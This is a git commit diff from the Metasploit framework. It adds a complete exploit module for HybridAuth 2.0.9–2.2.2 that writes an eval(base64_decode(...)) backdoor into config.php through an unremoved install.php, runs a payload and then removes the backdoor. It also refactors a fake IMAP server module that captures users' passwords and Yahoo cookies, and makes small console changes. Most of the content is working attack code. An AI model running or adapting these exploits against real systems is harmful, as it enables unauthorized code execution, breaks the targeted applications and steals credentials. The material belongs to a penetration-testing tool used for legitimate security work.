Merge branch 'master' into aruba-testing

bug/bundler_fix
darkbushido 2014-08-20 20:06:40 -05:00
commit 07ea8bedb5
5 changed files with 189 additions and 43 deletions

View File

@ -60,11 +60,6 @@ class Metasploit::Framework::Command::Base
# the configuration from the parsed options. # the configuration from the parsed options.
parsed_options.configure(Rails.application) parsed_options.configure(Rails.application)
# support disabling the database
unless parsed_options.options.database.disable
Metasploit::Framework::Require.optionally_active_record_railtie
end
Rails.application.require_environment! Rails.application.require_environment!
parsed_options parsed_options

View File

@ -6,13 +6,11 @@
require 'msf/core' require 'msf/core'
class Metasploit3 < Msf::Auxiliary class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::TcpServer
include Msf::Auxiliary::Report include Msf::Auxiliary::Report
def initialize def initialize
super( super(
'Name' => 'Authentication Capture: IMAP', 'Name' => 'Authentication Capture: IMAP',
@ -56,11 +54,11 @@ class Metasploit3 < Msf::Auxiliary
def on_client_data(c) def on_client_data(c)
data = c.get_once data = c.get_once
return if not data return unless data
num,cmd,arg = data.strip.split(/\s+/, 3) num, cmd, arg = data.strip.split(/\s+/, 3)
arg ||= "" arg ||= ""
if(cmd.upcase == "CAPABILITY") if cmd.upcase == 'CAPABILITY'
c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS " + c.put "* CAPABILITY IMAP4 IMAP4rev1 IDLE LOGIN-REFERRALS " +
"MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT " + "MAILBOX-REFERRALS NAMESPACE LITERAL+ UIDPLUS CHILDREN UNSELECT " +
"QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 " + "QUOTA XLIST XYZZY LOGIN-REFERRALS AUTH=XYMCOOKIE AUTH=XYMCOOKIEB64 " +
@ -68,38 +66,26 @@ class Metasploit3 < Msf::Auxiliary
c.put "#{num} OK CAPABILITY completed.\r\n" c.put "#{num} OK CAPABILITY completed.\r\n"
end end
if(cmd.upcase == "AUTHENTICATE" and arg.upcase == "XYMPKI") # Handle attempt to authenticate using Yahoo's magic cookie
# Used by iPhones and Zimbra
if cmd.upcase == 'AUTHENTICATE' && arg.upcase == 'XYMPKI'
c.put "+ \r\n" c.put "+ \r\n"
cookie1 = c.get_once cookie1 = c.get_once
c.put "+ \r\n" c.put "+ \r\n"
cookie2 = c.get_once cookie2 = c.get_once
report_auth_info( register_creds(@state[c][:ip], cookie1, cookie2, 'imap-yahoo')
:host => @state[c][:ip],
:sname => 'imap-yahoo',
:port => datastore['SRVPORT'],
:source_type => "captured",
:user => cookie1,
:pass => cookie2
)
return return
end end
if(cmd.upcase == "LOGIN") if cmd.upcase == 'LOGIN'
@state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2) @state[c][:user], @state[c][:pass] = arg.split(/\s+/, 2)
report_auth_info( register_creds(@state[c][:ip], @state[c][:user], @state[c][:pass], 'imap')
:host => @state[c][:ip],
:port => datastore['SRVPORT'],
:sname => 'imap',
:user => @state[c][:user],
:pass => @state[c][:pass],
:active => true
)
print_status("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}") print_status("IMAP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
return return
end end
if(cmd.upcase == "LOGOUT") if cmd.upcase == 'LOGOUT'
c.put("* BYE IMAP4rev1 Server logging out\r\n") c.put("* BYE IMAP4rev1 Server logging out\r\n")
c.put("#{num} OK LOGOUT completed\r\n") c.put("#{num} OK LOGOUT completed\r\n")
return return
@ -108,12 +94,43 @@ class Metasploit3 < Msf::Auxiliary
@state[c][:pass] = data.strip @state[c][:pass] = data.strip
c.put "#{num} NO LOGIN FAILURE\r\n" c.put "#{num} NO LOGIN FAILURE\r\n"
return return
end end
def on_client_close(c) def on_client_close(c)
@state.delete(c) @state.delete(c)
end end
def register_creds(client_ip, user, pass, service_name)
# Build service information
service_data = {
address: client_ip,
port: datastore['SRVPORT'],
service_name: service_name,
protocol: 'tcp',
workspace_id: myworkspace_id
}
# Build credential information
credential_data = {
origin_type: :service,
module_fullname: self.fullname,
private_data: pass,
private_type: :password,
username: user,
workspace_id: myworkspace_id
}
credential_data.merge!(service_data)
credential_core = create_credential(credential_data)
# Assemble the options hash for creating the Metasploit::Credential::Login object
login_data = {
core: credential_core,
status: Metasploit::Model::Login::Status::UNTRIED,
workspace_id: myworkspace_id
}
login_data.merge!(service_data)
create_credential_login(login_data)
end
end end

View File

@ -10,16 +10,16 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE include Msf::Exploit::EXE
include Msf::Exploit::Remote::BrowserAutopwn # include Msf::Exploit::Remote::BrowserAutopwn
include Msf::Exploit::Remote::FirefoxPrivilegeEscalation include Msf::Exploit::Remote::FirefoxPrivilegeEscalation
autopwn_info({ # autopwn_info({
:ua_name => HttpClients::FF, # :ua_name => HttpClients::FF,
:ua_minver => "17.0", # :ua_minver => "17.0",
:ua_maxver => "17.0.1", # :ua_maxver => "17.0.1",
:javascript => true, # :javascript => true,
:rank => NormalRanking # :rank => NormalRanking
}) # })
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,

View File

@ -0,0 +1,138 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking # application config.php is overwritten
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'HybridAuth install.php PHP Code Execution',
'Description' => %q{
This module exploits a PHP code execution vulnerability in
HybridAuth versions 2.0.9 to 2.2.2. The install file 'install.php'
is not removed after installation allowing unauthenticated users to
write PHP code to the application configuration file 'config.php'.
Note: This exploit will overwrite the application configuration file
rendering the application unusable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Pichaya Morimoto', # Discovery and PoC
'Brendan Coles <bcoles[at]gmail.com>' # Metasploit
],
'References' =>
[
['EDB', '34273'],
['OSVDB','109838']
],
'Arch' => ARCH_PHP,
'Platform' => 'php',
'Targets' =>
[
# Tested:
# HybridAuth versions 2.0.9, 2.0.10, 2.0.11, 2.1.2, 2.2.2 on Apache/2.2.14 (Ubuntu)
['HybridAuth version 2.0.9 to 2.2.2 (PHP Payload)', {}]
],
'Privileged' => false,
'DisclosureDate' => 'Aug 4 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to HybridAuth library', '/hybridauth/'])
], self.class)
end
#
# Check:
# * install.php exists
# * config.php is writable
# * HybridAuth version is 2.0.9 to 2.0.11, 2.1.x, or 2.2.0 to 2.2.2
#
def check
res = send_request_cgi 'uri' => normalize_uri(target_uri.path, 'install.php')
if !res
vprint_error "#{peer} - Connection failed"
return Exploit::CheckCode::Unknown
elsif res.code == 404
vprint_error "#{peer} - Could not find install.php"
elsif res.body =~ />([^<]+)<\/span> must be <b >WRITABLE</
vprint_error "#{peer} - #{$1} is not writable"
elsif res.body =~ />HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</
version = res.body.scan(/>HybridAuth (2\.[012]\.[\d\.]+(-dev)?) Installer</).first.first
vprint_status "#{peer} - Found version: #{version}"
if version =~ /^2\.(0\.(9|10|11)|1\.[\d]+|2\.[012])/
return Exploit::CheckCode::Vulnerable
else
vprint_error "#{peer} - HybridAuth version #{version} is not vulnerable"
end
end
Exploit::CheckCode::Safe
end
#
# Exploit
#
def exploit
# check vuln
if check != Exploit::CheckCode::Vulnerable
fail_with Exploit::Failure::NotVulnerable, "#{peer} - Target is not vulnerable"
end
# write backdoor
print_status "#{peer} - Writing backdoor to config.php"
payload_param = rand(1000)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'install.php'),
'data' => "OPENID_ADAPTER_STATUS=eval(base64_decode($_POST[#{payload_param}])))));/*"
)
if !res
fail_with Failure::Unknown, "#{peer} - Connection failed"
elsif res.body =~ /Installation completed/
print_good "#{peer} - Wrote backdoor successfully"
else
fail_with Failure::UnexpectedReply, "#{peer} - Coud not write backdoor to 'config.php'"
end
# execute payload
code = Rex::Text.encode_base64(payload.encoded)
print_status "#{peer} - Sending payload to config.php backdoor (#{code.length} bytes)"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'config.php'),
'data' => "#{payload_param}=#{code}"
}, 5)
if !res
print_warning "#{peer} - No response"
elsif res.code == 404
fail_with Failure::NotFound, "#{peer} - Could not find config.php"
elsif res.code == 200 || res.code == 500
print_good "#{peer} - Sent payload successfully"
end
# remove backdoor
print_status "#{peer} - Removing backdoor from config.php"
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'install.php'),
'data' => 'OPENID_ADAPTER_STATUS='
)
if !res
print_error "#{peer} - Connection failed"
elsif res.body =~ /Installation completed/
print_good "#{peer} - Removed backdoor successfully"
else
print_warning "#{peer} - Could not remove payload from config.php"
end
end
end

View File

@ -1,13 +1,9 @@
#!/usr/bin/env ruby #!/usr/bin/env ruby
# -*- coding: binary -*- # -*- coding: binary -*-
# #
# $Id$
#
# This user interface provides users with a command console interface to the # This user interface provides users with a command console interface to the
# framework. # framework.
# #
# $Revision$
#
# #
# Standard Library # Standard Library
@ -20,7 +16,7 @@ require 'pathname'
# #
# @see https://github.com/rails/rails/blob/v3.2.17/railties/lib/rails/generators/rails/app/templates/script/rails#L3-L5 # @see https://github.com/rails/rails/blob/v3.2.17/railties/lib/rails/generators/rails/app/templates/script/rails#L3-L5
require Pathname.new(__FILE__).expand_path.parent.join('config', 'boot') require Pathname.new(__FILE__).realpath.expand_path.parent.join('config', 'boot')
require 'metasploit/framework/command/console' require 'metasploit/framework/command/console'
Metasploit::Framework::Command::Console.start Metasploit::Framework::Command::Console.start